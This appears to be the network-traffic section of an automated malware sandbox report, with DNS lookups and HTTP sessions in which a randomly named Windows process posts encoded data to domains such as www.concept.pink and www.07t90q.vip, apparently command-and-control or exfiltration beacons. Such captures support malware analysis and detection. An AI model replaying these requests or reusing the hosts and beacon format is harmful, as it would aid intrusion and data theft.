Sep 27, 2024 09:09:01.892854929 CEST	49726	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:09:01.904606104 CEST	49726	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:09:01.909461975 CEST	80	49726	3.33.130.190	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 09:07:57.312180996 CEST	59831	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:07:57.325773001 CEST	53	59831	1.1.1.1	192.168.2.5
Sep 27, 2024 09:08:14.908211946 CEST	60684	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:08:15.038696051 CEST	53	60684	1.1.1.1	192.168.2.5
Sep 27, 2024 09:08:28.620058060 CEST	49334	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:08:29.631078005 CEST	49334	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:08:30.646583080 CEST	49334	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:08:31.208528042 CEST	53	49334	1.1.1.1	192.168.2.5
Sep 27, 2024 09:08:31.208569050 CEST	53	49334	1.1.1.1	192.168.2.5
Sep 27, 2024 09:08:31.208581924 CEST	53	49334	1.1.1.1	192.168.2.5
Sep 27, 2024 09:08:44.728863001 CEST	55433	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:08:45.222532034 CEST	53	55433	1.1.1.1	192.168.2.5
Sep 27, 2024 09:08:58.838670015 CEST	56624	53	192.168.2.5	1.1.1.1
Sep 27, 2024 09:08:58.972412109 CEST	53	56624	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 09:07:57.312180996 CEST	192.168.2.5	1.1.1.1	0xd324	Standard query (0)	www.07t90q.vip	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:14.908211946 CEST	192.168.2.5	1.1.1.1	0x3210	Standard query (0)	www.concept.pink	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:28.620058060 CEST	192.168.2.5	1.1.1.1	0x1a1e	Standard query (0)	www.5oxzis.top	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:29.631078005 CEST	192.168.2.5	1.1.1.1	0x1a1e	Standard query (0)	www.5oxzis.top	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:30.646583080 CEST	192.168.2.5	1.1.1.1	0x1a1e	Standard query (0)	www.5oxzis.top	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:44.728863001 CEST	192.168.2.5	1.1.1.1	0x1957	Standard query (0)	www.kuaimaolife.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:58.838670015 CEST	192.168.2.5	1.1.1.1	0x56dd	Standard query (0)	www.nodigitalsmoke.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 09:07:57.325773001 CEST	1.1.1.1	192.168.2.5	0xd324	No error (0)	www.07t90q.vip	07t90q.vip		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 09:07:57.325773001 CEST	1.1.1.1	192.168.2.5	0xd324	No error (0)	07t90q.vip		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:07:57.325773001 CEST	1.1.1.1	192.168.2.5	0xd324	No error (0)	07t90q.vip		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:15.038696051 CEST	1.1.1.1	192.168.2.5	0x3210	No error (0)	www.concept.pink	concept.pink		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 09:08:15.038696051 CEST	1.1.1.1	192.168.2.5	0x3210	No error (0)	concept.pink		217.160.0.27	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:31.208528042 CEST	1.1.1.1	192.168.2.5	0x1a1e	No error (0)	www.5oxzis.top		20.2.217.253	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:31.208569050 CEST	1.1.1.1	192.168.2.5	0x1a1e	No error (0)	www.5oxzis.top		20.2.217.253	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:31.208581924 CEST	1.1.1.1	192.168.2.5	0x1a1e	No error (0)	www.5oxzis.top		20.2.217.253	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:45.222532034 CEST	1.1.1.1	192.168.2.5	0x1957	No error (0)	www.kuaimaolife.shop		38.55.251.233	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:58.972412109 CEST	1.1.1.1	192.168.2.5	0x56dd	No error (0)	www.nodigitalsmoke.org	nodigitalsmoke.org		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 09:08:58.972412109 CEST	1.1.1.1	192.168.2.5	0x56dd	No error (0)	nodigitalsmoke.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 27, 2024 09:08:58.972412109 CEST	1.1.1.1	192.168.2.5	0x56dd	No error (0)	nodigitalsmoke.org		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.07t90q.vip

www.concept.pink

www.5oxzis.top

www.kuaimaolife.shop

www.nodigitalsmoke.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	3.33.130.190	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:07:57.344508886 CEST	400	OUT	GET /9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw== HTTP/1.1 Host: www.07t90q.vip Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Sep 27, 2024 09:08:04.850677967 CEST	410	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 27 Sep 2024 07:08:04 GMT Content-Type: text/html Content-Length: 270 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 70 62 3d 33 46 4b 68 42 72 67 48 78 62 35 64 35 58 58 26 6a 7a 3d 73 59 78 6f 55 46 32 72 46 52 43 6b 68 61 41 6b 5a 2f 41 39 55 6a 37 64 4d 7a 54 42 7a 4b 73 64 35 36 6b 61 45 2b 74 42 4c 64 76 46 4b 30 4c 4c 41 64 41 43 2f 48 38 50 45 32 44 74 6a 71 51 70 6f 65 6d 4e 6a 6f 7a 6a 30 35 6e 47 35 70 47 2f 66 6d 79 37 65 4f 76 75 77 4d 51 44 54 63 30 63 66 75 70 55 2f 56 66 46 71 67 55 6c 49 45 38 6a 2b 54 4d 52 67 56 45 6e 4b 73 66 6f 46 74 7a 68 44 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw=="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	217.160.0.27	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:15.103463888 CEST	654	OUT	POST /4yov/ HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.concept.pink Referer: http://www.concept.pink/4yov/ Connection: close Content-Length: 203 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 49 4a 63 42 53 4f 41 4e 6f 4f 31 66 38 70 45 70 4b 6d 75 71 41 4e 2f 55 57 37 74 4e 64 54 56 68 61 4c 36 6d 72 45 73 3d Data Ascii: jz=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uIJcBSOANoO1f8pEpKmuqAN/UW7tNdTVhaL6mrEs=
Sep 27, 2024 09:08:15.712882996 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 27 Sep 2024 07:08:15 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Sep 27, 2024 09:08:15.712937117 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	217.160.0.27	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:17.647696972 CEST	674	OUT	POST /4yov/ HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.concept.pink Referer: http://www.concept.pink/4yov/ Connection: close Content-Length: 223 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 56 6d 4b 6c 37 75 45 50 35 56 70 6b 58 34 43 4d 6f 6f 30 50 34 35 63 33 75 7a 66 67 48 4d 44 42 74 41 78 2b 6a 55 70 33 52 74 32 6a 71 38 52 70 5a 37 6a 31 6e 44 75 30 52 79 7a 71 41 75 77 45 74 6b 53 37 6d 49 38 34 39 2f 46 4e 30 66 74 34 31 7a 74 56 6f 4d 5a 30 51 4b 73 48 75 4c 58 2b 41 53 6f 54 6d 47 46 5a 56 55 6c 4b 4a 51 5a 74 42 6d 77 4e 55 68 59 41 6c 35 6a 56 5a 59 4b 48 44 47 75 68 51 58 63 75 72 39 50 6a 6c 4d 33 38 77 7a 44 56 50 6f 52 4a 65 64 5a 6f 30 4f 4e 33 30 2f 70 44 51 45 6d 43 54 74 54 73 47 6f 6c 36 4d 6a 30 49 41 6f 71 57 31 54 37 7a 62 4a 46 2b 77 31 31 39 61 74 55 6a 46 76 5a 66 63 4e 44 4e Data Ascii: jz=9JO441eEy3RNVmKl7uEP5VpkX4CMoo0P45c3uzfgHMDBtAx+jUp3Rt2jq8RpZ7j1nDu0RyzqAuwEtkS7mI849/FN0ft41ztVoMZ0QKsHuLX+ASoTmGFZVUlKJQZtBmwNUhYAl5jVZYKHDGuhQXcur9PjlM38wzDVPoRJedZo0ON30/pDQEmCTtTsGol6Mj0IAoqW1T7zbJF+w119atUjFvZfcNDN
Sep 27, 2024 09:08:18.277955055 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 27 Sep 2024 07:08:18 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Sep 27, 2024 09:08:18.277988911 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	217.160.0.27	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:20.421360016 CEST	1691	OUT	POST /4yov/ HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.concept.pink Referer: http://www.concept.pink/4yov/ Connection: close Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 56 6d 4b 6c 37 75 45 50 35 56 70 6b 58 34 43 4d 6f 6f 30 50 34 35 63 33 75 7a 66 67 48 4d 4c 42 74 56 6c 2b 6b 45 56 33 53 74 32 6a 30 73 52 6f 5a 37 6a 53 6e 44 32 77 52 79 76 51 41 74 49 45 69 6d 4b 37 78 4d 6f 34 6b 50 46 4e 72 50 74 35 6f 44 74 4d 6f 49 39 77 51 4b 63 48 75 4c 58 2b 41 52 41 54 32 6b 68 5a 54 55 6c 4a 4f 51 5a 71 51 57 77 6c 55 68 51 51 6c 35 57 75 61 6f 71 48 43 6c 57 68 52 69 6f 75 70 64 50 68 6d 4d 33 6b 77 7a 66 4b 50 6f 4d 77 65 65 45 4e 30 4e 64 33 6c 71 4e 64 49 6d 6d 6d 4f 50 4c 4e 55 61 64 6c 5a 6c 67 50 48 4c 75 48 78 54 72 4d 5a 49 70 63 6d 46 4a 2f 64 2b 74 6e 45 71 55 50 51 62 6d 52 65 39 41 37 50 48 79 61 49 55 2f 35 4d 78 2f 47 4a 6a 6a 43 39 67 31 57 38 4b 44 47 64 4f 68 5a 2b 6f 4e 54 77 5a 70 53 37 5a 7a 49 2b 78 4d 61 76 51 6c 64 4c 38 65 74 47 56 2f 6a 76 36 58 78 67 71 6f 4a 31 51 55 56 61 5a 2b 41 58 6f 54 73 67 53 4a 4b 32 2f 77 6d 74 55 34 4f 32 61 4f 6d 6a 67 62 41 68 45 63 39 7a 51 6f 4a 73 68 75 50 57 34 54 [TRUNCATED] Data Ascii: jz=9JO441eEy3RNVmKl7uEP5VpkX4CMoo0P45c3uzfgHMLBtVl+kEV3St2j0sRoZ7jSnD2wRyvQAtIEimK7xMo4kPFNrPt5oDtMoI9wQKcHuLX+ARAT2khZTUlJOQZqQWwlUhQQl5WuaoqHClWhRioupdPhmM3kwzfKPoMweeEN0Nd3lqNdImmmOPLNUadlZlgPHLuHxTrMZIpcmFJ/d+tnEqUPQbmRe9A7PHyaIU/5Mx/GJjjC9g1W8KDGdOhZ+oNTwZpS7ZzI+xMavQldL8etGV/jv6XxgqoJ1QUVaZ+AXoTsgSJK2/wmtU4O2aOmjgbAhEc9zQoJshuPW4TLUXEwLUowJG3XzbcUzdRZwF9hoyIPu8DfG+k5o+BeF0y6NAennu+yeWb33M/TZRZd7Qr5ogLEQN7zQr/do97crqVYGcblXqiqBjdWggu/jFegVe3fscIkRaUC5rX6yrp4tpES5oAQs0JRgjtJuEvb57cR+MnPny70DpCRPglBynbivfpVoBQqbO0pKpN8wjNCX/NiO5X8WW1+t9P7ROAqWOztx8LNG+bHFa9R7FabsTzMzgImD1q6S+RFfZXnG9dH/LfuNf5Q/1/1nGditwbvDPY3U5cVXZW7VVC/Tfg8zHDITpooTnY8w93TYzh+gwZV4YQdnCWnTfxmQc9j5hjxHKvkYeDeVYaUxceGV6Ys/OMT2LbKYoTaywiU97G95JT9vjSYVWwiA8FSpQAo+QK94JdIAVr6htBAqpj6Beh3pF4GutHS9az0cvzXRVfI+d5uNrn8fcPmXVc0/yjDsh2/raVmdbsDVKlOKaOgR5DuVqX+lxq5L7DUm8Y0O5zyT7Ja6LIY1pKWIw7vFEMAOXUOX0/ZUVy0SbJPs6ZjIk/Oa+d20BMi1VQbSfrTUVOqs6CEzyW2Ydb3HLsT/uCdMx5W/Tqjo3PoMck1dno4Ib6itWkiiiD2iFedGmmeNMrpxlFTDcrFT3E+MQA+WuJMxVV6TXJNlMdngYbgG [TRUNCATED]
Sep 27, 2024 09:08:21.110012054 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 27 Sep 2024 07:08:20 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Sep 27, 2024 09:08:21.110044003 CEST	224	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+
Sep 27, 2024 09:08:21.110070944 CEST	675	IN	Data Raw: 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38 9e 57 d4 65 ea e6 83 44 97 97 bb 06 Data Ascii: EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK\|i(eOx.hp8<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49716	217.160.0.27	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:22.961647987 CEST	402	OUT	GET /4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Sep 27, 2024 09:08:23.600423098 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Fri, 27 Sep 2024 07:08:23 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 